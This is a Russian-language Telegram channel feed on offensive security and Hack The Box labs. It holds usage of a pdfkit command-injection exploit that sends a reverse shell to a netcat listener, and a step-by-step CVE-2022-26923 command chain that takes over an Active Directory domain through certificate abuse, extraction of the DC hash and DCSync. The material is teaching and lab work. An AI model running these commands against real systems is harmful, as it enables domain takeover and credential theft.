Путь до хакера | Cyber security
1.03K subscribers
71 photos
2 videos
17 files
139 links
Блог об информационной безопасности 👾

Всё, что тебе нужно, здесь: https://github.com/artroneee/Cyber-Security-Collection

По всем вопросам:
@artrone
@cherepawwka
Download Telegram
💉Получен root для тачки Inject💉
Райтап постараюсь сделать сегодня
#hack_the_box #новости
🔥3
Кстати, HTB запустила "Сезон открытого бета-тестирования"
Это что-то типо соревнований с рейтингом, который набирается за взлом тачек
За каждое звание от Bronze до Holo в конце сезона, который длится 3 месяца, выдаются свои плюшки
Сюда я буду выкатывать райтапы некоторых из этих тачек, поэтому вы также сможете получить призы😉
#новости #hack_the_box
🔥3
💉Райтап на тачку Inject💉

Читать: https://teletype.in/@hackerblog/1mllvEhUJhW

#райтап #hack_the_box
🔥7👍1
На 1к подписчиков планируется провести ребрендинг канала
Как смотрите на это?
P.S под «ребрендингом» я подразумеваю смену названия и авы канала
Anonymous Poll
57%
Давай
43%
Лучше не надо
👍6
Privileger
Privileger позволяет вам максимально просто работать с привилегиями в ОС Windows. Присутствуют следующие режимы:
◽️Добавить привилегии аккаунту.
◽️Запустить процесс, добавив в его токен конкретную привилегию.
◽️Удалить у пользователя привилегию.
◽️Режим поиска. Позволяет обнаруживать на конкретном компьютере объекты, обладающие какой-либо привилегией.
◽️Перечислить все привилегии, которые назначены конкретному аккаунту.

Подробнее: https://github.com/MzHmO/Privileger

#софт
🔥5👍1
PDFkit-CMD-Injection (CVE-2022-25765)

Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6

Использование:
nc -lvnp 1337
./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337


Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)

Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
4👍1
Forwarded from SecurityLab.ru
Принятие законопроекта о "белых хакерах" в России, предлагающего ввести понятие bug bounty в правовое поле и изменения в Уголовный кодекс, может быть отложено из-за недовольства ФСБ и ФСТЭК. Силовые ведомства выступают против либерализации положений УК и высказали соответствующую позицию на рабочих совещаниях по законопроекту.

#белыехакеры #bugbounty #Уголовныйкодекс #ФСБ #ФСТЭК
🤯2
Получен рут на тачке Socket📍

Райтап на днях
#новости #hack_the_box
👍5👏21👌1
Всем привет 👋
После долгого простоя, я решил продолжить вести канал.

Немного изменений:
• Новый соведущий @cherepawwka
• Канал будет в форме статей, т.е. не будет постов по типу «тулза - ссылка»
• Периодичность постов будет примерно раз в неделю-две
• Статьи будут от разных авторов, а также совместные (в том числе райтапы)
• Теперь тематика канала будет направлена на уязвимости и их эксплуатацию , а также дефенсу (как повезет)

Старый контент останется на месте, поскольку там есть что-то полезное

Ну, основные моменты я вроде перечислил.
Спасибо тем, кто остался 🤝
🔥182
Не знаю почему, но свое возвращение хотелось бы начать с райтапа 🤨

Тачка: Системный администратор
Категория: Active Directory
Платформа: Codeby Games

Читать: тык

UPD: Кстати, как относитесь к райтапам? Есть идея выложить целых 5 штук по этой категории на платформе Codeby. Интересно будет?

#active_directory #райтап
❤‍🔥71🔥1
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️

Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).

🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
# Установка
pip install certipy-ad

# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10

# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
Начнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'
Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

certipy auth -pfx testpc.pfx

Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local

Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733

Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt

Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #active_directory
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍1😁1